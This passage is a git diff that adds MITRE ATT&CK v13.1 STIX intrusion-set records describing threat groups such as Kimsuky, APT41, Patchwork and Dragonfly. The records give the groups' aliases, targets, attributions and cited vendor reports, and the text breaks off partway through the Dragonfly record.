b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--0ea72cd5-ca30-46ba-bc04-378f701c658f.json new file mode 100644 index 0000000000000000000000000000000000000000..9e65ea353255da8ce03a17283d8d438e0ba8f7f6 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--0ea72cd5-ca30-46ba-bc04-378f701c658f.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--7c16e806-e7ea-4af5-9e72-cdaf1210d2b4", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "GCMAN" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--0ea72cd5-ca30-46ba-bc04-378f701c658f", + "type": "intrusion-set", + "created": "2017-05-31T21:32:05.611Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0036", + "external_id": "G0036" + }, + { + "source_name": "GCMAN", + "description": "(Citation: Securelist GCMAN)" + }, + { + "source_name": "Securelist GCMAN", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, February 8). APT-style bank robberies increase with Metel, GCMAN and Carbanak 2.0 attacks. Retrieved April 20, 2016.", + "url": "https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/" + } + ], + "modified": "2020-03-30T19:03:44.853Z", + "name": "GCMAN", + "description": "[GCMAN](https://attack.mitre.org/groups/G0036) is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services. (Citation: Securelist GCMAN)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--0ec2f388-bf0f-4b5c-97b1-fc736d26c25f.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--0ec2f388-bf0f-4b5c-97b1-fc736d26c25f.json new file mode 100644 index 0000000000000000000000000000000000000000..7cdd11b0e8c1b452863e00a01ce13eff58543125 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--0ec2f388-bf0f-4b5c-97b1-fc736d26c25f.json 
@@ -0,0 +1,120 @@ +{ + "type": "bundle", + "id": "bundle--86c14626-5a41-4ed8-8d0e-f8fd83383717", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-11-30T22:53:00.875Z", + "name": "Kimsuky", + "description": "[Kimsuky](https://attack.mitre.org/groups/G0094) is a North Korea-based cyber espionage group that has been active since at least 2012. The group initially focused on targeting South Korean government entities, think tanks, and individuals identified as experts in various fields, and expanded its operations to include the United States, Russia, Europe, and the UN. [Kimsuky](https://attack.mitre.org/groups/G0094) has focused its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.(Citation: EST Kimsuky April 2019)(Citation: BRI Kimsuky April 2019)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: CISA AA20-301A Kimsuky)\n\n[Kimsuky](https://attack.mitre.org/groups/G0094) was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. 
compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).(Citation: Netscout Stolen Pencil Dec 2018)(Citation: EST Kimsuky SmokeScreen April 2019)(Citation: AhnLab Kimsuky Kabar Cobra Feb 2019)\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.", + "aliases": [ + "Kimsuky", + "STOLEN PENCIL", + "Thallium", + "Black Banshee", + "Velvet Chollima" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.1", + "x_mitre_contributors": [ + "Taewoo Lee, KISA", + "Dongwook Kim, KISA" + ], + "type": "intrusion-set", + "id": "intrusion-set--0ec2f388-bf0f-4b5c-97b1-fc736d26c25f", + "created": "2019-08-26T15:03:02.577Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0094", + "external_id": "G0094" + }, + { + "source_name": "Thallium", + "description": "(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)" + }, + { + "source_name": "Black Banshee", + "description": "(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)" + }, + { + "source_name": "STOLEN PENCIL", + "description": "(Citation: Netscout Stolen Pencil Dec 2018)" + }, + { + "source_name": "Kimsuky", + "description": "(Citation: Securelist Kimsuky Sept 2013)(Citation: Malwarebytes Kimsuky June 2021)" + }, + { + "source_name": "Velvet Chollima", + "description": "(Citation: Zdnet Kimsuky Dec 2018)(Citation: ThreatConnect Kimsuky September 2020)(Citation: Malwarebytes Kimsuky June 2021)" + }, + { + "source_name": "AhnLab Kimsuky Kabar Cobra Feb 2019", + "description": "AhnLab. (2019, February 28). 
Operation Kabar Cobra - Tenacious cyber-espionage campaign by Kimsuky Group. Retrieved September 29, 2021.", + "url": "https://global.ahnlab.com/global/upload/download/techreport/%5BAnalysis_Report%5DOperation%20Kabar%20Cobra.pdf" + }, + { + "source_name": "EST Kimsuky April 2019", + "description": "Alyac. (2019, April 3). Kimsuky Organization Steals Operation Stealth Power. Retrieved August 13, 2019.", + "url": "https://blog.alyac.co.kr/2234" + }, + { + "source_name": "Netscout Stolen Pencil Dec 2018", + "description": "ASERT team. (2018, December 5). STOLEN PENCIL Campaign Targets Academia. Retrieved February 5, 2019.", + "url": "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/" + }, + { + "source_name": "BRI Kimsuky April 2019", + "description": "BRI. (2019, April). Kimsuky unveils APT campaign 'Smoke Screen' aimed at Korea and America. Retrieved October 7, 2019.", + "url": "https://brica.de/alerts/alert/public/1255063/kimsuky-unveils-apt-campaign-smoke-screen-aimed-at-korea-and-america/" + }, + { + "source_name": "Zdnet Kimsuky Dec 2018", + "description": "Cimpanu, C.. (2018, December 5). Cyber-espionage group uses Chrome extension to infect victims. Retrieved August 26, 2019.", + "url": "https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/" + }, + { + "source_name": "CISA AA20-301A Kimsuky", + "description": "CISA, FBI, CNMF. (2020, October 27). https://us-cert.cisa.gov/ncas/alerts/aa20-301a. Retrieved November 4, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-301a" + }, + { + "source_name": "Cybereason Kimsuky November 2020", + "description": "Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020.", + "url": "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite" + }, + { + "source_name": "EST Kimsuky SmokeScreen April 2019", + "description": "ESTSecurity. (2019, April 17). 
Analysis of the APT Campaign \u2018Smoke Screen\u2019 targeting to Korea and US \ucd9c\ucc98: https://blog.alyac.co.kr/2243 [\uc774\uc2a4\ud2b8\uc2dc\ud050\ub9ac\ud2f0 \uc54c\uc57d \ube14\ub85c\uadf8]. Retrieved September 29, 2021.", + "url": "https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf" + }, + { + "source_name": "Malwarebytes Kimsuky June 2021", + "description": "Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021.", + "url": "https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/" + }, + { + "source_name": "Securelist Kimsuky Sept 2013", + "description": "Tarakanov , D.. (2013, September 11). The \u201cKimsuky\u201d Operation: A North Korean APT?. Retrieved August 13, 2019.", + "url": "https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/" + }, + { + "source_name": "ThreatConnect Kimsuky September 2020", + "description": "ThreatConnect. (2020, September 28). Kimsuky Phishing Operations Putting In Work. Retrieved October 30, 2020.", + "url": "https://threatconnect.com/blog/kimsuky-phishing-operations-putting-in-work/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--129f2f77-1ab2-4c35-bd5e-21260cee92af.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--129f2f77-1ab2-4c35-bd5e-21260cee92af.json new file mode 100644 index 0000000000000000000000000000000000000000..89930debdf625eeb84674d0df45539f77854fd32 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--129f2f77-1ab2-4c35-bd5e-21260cee92af.json 
@@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--3bc59957-fb7e-4f8d-8ca5-15fb6fc84aa7", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T18:48:18.917Z", + "name": "EXOTIC LILY", + "description": "[EXOTIC LILY](https://attack.mitre.org/groups/G1011) is a financially motivated group that has been closely linked with [Wizard Spider](https://attack.mitre.org/groups/G0102) and the deployment of ransomware including [Conti](https://attack.mitre.org/software/S0575) and [Diavol](https://attack.mitre.org/software/S0659). [EXOTIC LILY](https://attack.mitre.org/groups/G1011) may be acting as an initial access broker for other malicious actors, and has targeted a wide range of industries including IT, cybersecurity, and healthcare since at least September 2021.(Citation: Google EXOTIC LILY March 2022)", + "aliases": [ + "EXOTIC LILY" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Phill Taylor, BT Security" + ], + "type": "intrusion-set", + "id": "intrusion-set--129f2f77-1ab2-4c35-bd5e-21260cee92af", + "created": "2022-08-18T15:25:59.689Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1011", + "external_id": "G1011" + }, + { + "source_name": "Google EXOTIC LILY March 2022", + "description": "Stolyarov, V. (2022, March 17). Exposing initial access broker with ties to Conti. Retrieved August 18, 2022.", + "url": "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--16ade1aa-0ea1-4bb7-88cc-9079df2ae756.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--16ade1aa-0ea1-4bb7-88cc-9079df2ae756.json new file mode 100644 index 0000000000000000000000000000000000000000..3e382e02efcffe1b0342277e446d119dc309a727 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--16ade1aa-0ea1-4bb7-88cc-9079df2ae756.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--48d4071d-6dd9-448f-9b8b-9b86c7a5dfe8", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "admin@338" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Tatsuya Daitoku, Cyber Defense Institute, Inc." + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--16ade1aa-0ea1-4bb7-88cc-9079df2ae756", + "type": "intrusion-set", + "created": "2017-05-31T21:31:53.579Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0018", + "external_id": "G0018" + }, + { + "source_name": "admin@338", + "description": "(Citation: FireEye admin@338)" + }, + { + "source_name": "FireEye admin@338", + "description": "FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.", + "url": "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html" + } + ], + "modified": "2020-03-18T19:54:59.120Z", + "name": "admin@338", + "description": "[admin@338](https://attack.mitre.org/groups/G0018) is a China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as [PoisonIvy](https://attack.mitre.org/software/S0012), as well as some non-public backdoors. (Citation: FireEye admin@338)", + "x_mitre_version": "1.2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0.json new file mode 100644 index 0000000000000000000000000000000000000000..dfc90e4b3c4326aa6f95dfc55704dc8b38635299 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0.json 
@@ -0,0 +1,111 @@ +{ + "type": "bundle", + "id": "bundle--d29d6bf6-25d9-47d3-bf5c-80e8648e3881", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T05:08:20.780Z", + "name": "Patchwork", + "description": "[Patchwork](https://attack.mitre.org/groups/G0040) is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://attack.mitre.org/groups/G0040) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://attack.mitre.org/groups/G0040) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)", + "aliases": [ + "Patchwork", + "Hangover Group", + "Dropping Elephant", + "Chinastrats", + "MONSOON", + "Operation Hangover" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.5", + "type": "intrusion-set", + "id": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0", + "created": "2017-05-31T21:32:07.145Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0040", + "external_id": "G0040" + }, + { + "source_name": "Patchwork", + "description": "(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork) (Citation: Securelist Dropping Elephant) (Citation: PaloAlto Patchwork Mar 2018) (Citation: Volexity Patchwork June 2018)" + }, + { + "source_name": "Chinastrats", + "description": "(Citation: Securelist Dropping Elephant)" + }, + { + "source_name": "Dropping Elephant", + "description": "(Citation: Symantec Patchwork) (Citation: 
Securelist Dropping Elephant) (Citation: PaloAlto Patchwork Mar 2018) (Citation: Volexity Patchwork June 2018)" + }, + { + "source_name": "Hangover Group", + "description": "[Patchwork](https://attack.mitre.org/groups/G0040) and the Hangover Group have both been referenced as aliases for the threat group associated with Operation Monsoon.(Citation: PaloAlto Patchwork Mar 2018)(Citation: Unit 42 BackConfig May 2020)(Citation: Forcepoint Monsoon)" + }, + { + "source_name": "Cymmetria Patchwork", + "description": "Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016.", + "url": "https://web.archive.org/web/20180825085952/https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf" + }, + { + "source_name": "Operation Hangover May 2013", + "description": "Fagerland, S., et al. (2013, May). Operation Hangover: Unveiling an Indian Cyberattack Infrastructure. Retrieved September 26, 2016.", + "url": "http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf" + }, + { + "source_name": "Symantec Patchwork", + "description": "Hamada, J.. (2016, July 25). Patchwork cyberespionage group expands targets from governments to wide range of industries. Retrieved August 17, 2016.", + "url": "http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries" + }, + { + "source_name": "Unit 42 BackConfig May 2020", + "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020.", + "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/" + }, + { + "source_name": "Operation Hangover", + "description": "It is believed that the actors behind [Patchwork](https://attack.mitre.org/groups/G0040) are the same actors behind Operation Hangover. 
(Citation: Forcepoint Monsoon) (Citation: Operation Hangover May 2013)" + }, + { + "source_name": "Securelist Dropping Elephant", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, July 8). The Dropping Elephant \u2013 aggressive cyber-espionage in the Asian region. Retrieved August 3, 2016.", + "url": "https://securelist.com/the-dropping-elephant-actor/75328/" + }, + { + "source_name": "PaloAlto Patchwork Mar 2018", + "description": "Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/" + }, + { + "source_name": "TrendMicro Patchwork Dec 2017", + "description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.", + "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf" + }, + { + "source_name": "Volexity Patchwork June 2018", + "description": "Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.", + "url": "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" + }, + { + "source_name": "MONSOON", + "description": "MONSOON is the name of an espionage campaign; we use it here to refer to the actor group behind the campaign. (Citation: Forcepoint Monsoon) (Citation: PaloAlto Patchwork Mar 2018)" + }, + { + "source_name": "Forcepoint Monsoon", + "description": "Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. 
Retrieved September 22, 2016.", + "url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7.json new file mode 100644 index 0000000000000000000000000000000000000000..fdadc60797eb609bbbdce8e83d90819df0fd2595 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7.json 
@@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--02535f7f-edd3-4265-81df-9a0db5541090", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-23T15:45:58.846Z", + "name": "APT41", + "description": "[APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)\n", + "aliases": [ + "APT41", + "Wicked Panda" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.1", + "x_mitre_contributors": [ + "Kyaw Pyiyt Htet, @KyawPyiytHtet" + ], + "type": "intrusion-set", + "id": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7", + "created": "2019-09-23T13:43:36.945Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0096", + "external_id": "G0096" + }, + { + "source_name": "Wicked Panda", + "description": "(Citation: Crowdstrike GTR2020 Mar 2020)" + }, + { + "source_name": "APT41", + "description": "(Citation: FireEye APT41 2019)" + }, + { + "source_name": "Crowdstrike GTR2020 Mar 2020", + "description": "Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.", + "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" + }, + { + "source_name": "FireEye APT41 2019", + "description": "FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. 
Retrieved September 23, 2019.", + "url": "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf" + }, + { + "source_name": "FireEye APT41 Aug 2019", + "description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.", + "url": "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf" + }, + { + "source_name": "Group IB APT 41 June 2021", + "description": "Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.", + "url": "https://www.group-ib.com/blog/colunmtk-apt41/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1.json new file mode 100644 index 0000000000000000000000000000000000000000..53c2f67202684404f7f94499f73d1e4481bd9056 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1.json 
@@ -0,0 +1,145 @@ +{ + "type": "bundle", + "id": "bundle--56ccd702-229b-48b8-b977-46e6e50acfdc", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:03:28.170Z", + "name": "Dragonfly", + "description": "[Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16.(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) Active since at least 2010, [Dragonfly](https://attack.mitre.org/groups/G0035) has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)(Citation: Symantec Dragonfly 2.0 October 2017)", + "aliases": [ + "Dragonfly", + "TEMP.Isotope", + "DYMALLOY", + "Berserk Bear", + "TG-4192", + "Crouching Yeti", + "IRON LIBERTY", + "Energetic Bear" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.1", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1", + "created": "2017-05-31T21:32:05.217Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0035", + "external_id": "G0035" + }, + { + "source_name": "DYMALLOY", + "description": "(Citation: Dragos DYMALLOY )(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "Berserk Bear", + "description": "(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ 
Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "TEMP.Isotope", + "description": "(Citation: Mandiant Ukraine Cyber Threats January 2022)(Citation: Gigamon Berserk Bear October 2021)" + }, + { + "source_name": "Crouching Yeti", + "description": "(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "IRON LIBERTY", + "description": "(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "TG-4192", + "description": "(Citation: Secureworks IRON LIBERTY July 2019)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "Dragonfly", + "description": "(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "Energetic Bear", + "description": "(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "CISA AA20-296A Berserk Bear December 2020", + "description": "CISA. (2020, December 1). Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets. 
Retrieved December 9, 2021.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa20-296a#revisions" + }, + { + "source_name": "DOJ Russia Targeting Critical Infrastructure March 2022", + "description": "Department of Justice. (2022, March 24). Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide. Retrieved April 5, 2022.", + "url": "https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical" + }, + { + "source_name": "Dragos DYMALLOY ", + "description": "Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020.", + "url": "https://www.dragos.com/threat/dymalloy/" + }, + { + "source_name": "Fortune Dragonfly 2.0 Sept 2017", + "description": "Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018.", + "url": "http://fortune.com/2017/09/06/hack-energy-grid-symantec/" + }, + { + "source_name": "Mandiant Ukraine Cyber Threats January 2022", + "description": "Hultquist, J. (2022, January 20). Anticipating Cyber Threats as the Ukraine Crisis Escalates. Retrieved January 24, 2022.", + "url": "https://www.mandiant.com/resources/ukraine-crisis-cyber-threats" + }, + { + "source_name": "Secureworks MCMD July 2019", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis" + }, + { + "source_name": "Secureworks IRON LIBERTY July 2019", + "description": "Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020.", + "url": "https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector" + }, + { + "source_name": "Secureworks Karagany July 2019", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. 
Retrieved August 12, 2020.", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector" + }, + { + "source_name": "Gigamon Berserk Bear October 2021", + "description": "Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE\u2019S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021.", + "url": "https://vblocalhost.com/uploads/VB2021-Slowik.pdf" + }, + { + "source_name": "Symantec Dragonfly Sept 2017", + "description": "Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.", + "url": "https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers" + }, + { + "source_name": "Symantec Dragonfly", + "description": "Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.", + "url": "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + }, + { + "source_name": 